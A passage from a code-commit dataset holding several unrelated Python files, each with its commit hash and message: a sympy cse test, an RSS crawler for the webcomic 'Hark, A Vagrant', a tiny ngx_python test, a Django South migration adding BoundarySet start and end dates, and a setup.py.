e2 = (x + y)*w
substs, reduced = cse([e1, e2])
assert substs == [(x0, x + y)]
assert reduced == [x0*z, x0*w]
| Python | 0.000001 | |
5a21b66f7ab77f419245d8c07d7473a6e1600fc4 | Add crawler for 'Hark, A Vagrant' | comics/crawler/crawlers/harkavagrant.py | comics/crawler/crawlers/harkavagrant.py | from comics.crawler.base import BaseComicCrawler
from comics.crawler.meta import BaseComicMeta
class ComicMeta(BaseComicMeta):
name = 'Hark, A Vagrant!'
language = 'en'
url = 'http://www.harkavagrant.com/'
start_date = '2008-05-01'
history_capable_days = 120
schedule = 'Mo,Tu,We,Th,Fr,Sa,Su'
time_zone = -8
rights = 'Kate Beaton'
class ComicCrawler(BaseComicCrawler):
def _get_url(self):
self.parse_feed('http://www.rsspect.com/rss/vagrant.xml')
for entry in self.feed.entries:
if self.timestamp_to_date(entry.updated_parsed) == self.pub_date:
pieces = entry.summary.split('"')
for i, piece in enumerate(pieces):
if piece.count('src='):
self.url = pieces[i + 1]
if piece.count('title='):
self.title = pieces[i + 1]
if self.url and self.title:
return
| Python | 0.000002 | |
2f188d3d43741821126e381af9753e0e3d7be231 | test hello python file | t/library/hello.py | t/library/hello.py | import ngx
ngx.echo("Hello, Ngx_python\n") | Python | 0.00043 | |
c2a0b66ec1ad7f32e1291fc6a2312d2a4a06a6e3 | Add class-file to right location | src/mmhandler.py | src/mmhandler.py | class MmHandler:
pass
| Python | 0.000001 | |
aa096865f425a57ccbde51d0586be8a07403a6bd | Add migration for BoundarySet start/end see #25 | boundaries/south_migrations/0005_add_set_start_end_date.py | boundaries/south_migrations/0005_add_set_start_end_date.py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'BoundarySet.start_date'
db.add_column(u'boundaries_boundaryset', 'start_date',
self.gf('django.db.models.fields.DateField')(null=True, blank=True),
keep_default=False)
# Adding field 'BoundarySet.end_date'
db.add_column(u'boundaries_boundaryset', 'end_date',
self.gf('django.db.models.fields.DateField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'BoundarySet.start_date'
db.delete_column(u'boundaries_boundaryset', 'start_date')
# Deleting field 'BoundarySet.end_date'
db.delete_column(u'boundaries_boundaryset', 'end_date')
models = {
u'boundaries.boundary': {
'Meta': {'unique_together': "((u'slug', u'set'),)", 'object_name': 'Boundary'},
'centroid': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'}),
'extent': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label_point': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True', 'spatial_index': 'False', 'blank': 'True'}),
'metadata': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '192', 'db_index': 'True'}),
'set': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'boundaries'", 'to': u"orm['boundaries.BoundarySet']"}),
'set_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shape': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {}),
'simple_shape': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'})
},
u'boundaries.boundaryset': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'BoundarySet'},
'authority': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'domain': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'extent': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'extra': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'last_updated': ('django.db.models.fields.DateField', [], {}),
'licence_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'singular': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200', 'primary_key': 'True'}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['boundaries'] | Python | 0 | |
4f155252bf9d9508b955d7eecf589da347bff817 | Add a setup.cfg. | setup.py | setup.py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="imperial-painter-adam-thomas",
version="1.0.0",
author="Adam Thomas",
author_email="sortoflikechess@gmail.com",
description="A tool for generating prototype cards from Excel files and Django templates",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/adam-thomas/imperial-painter",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | Python | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.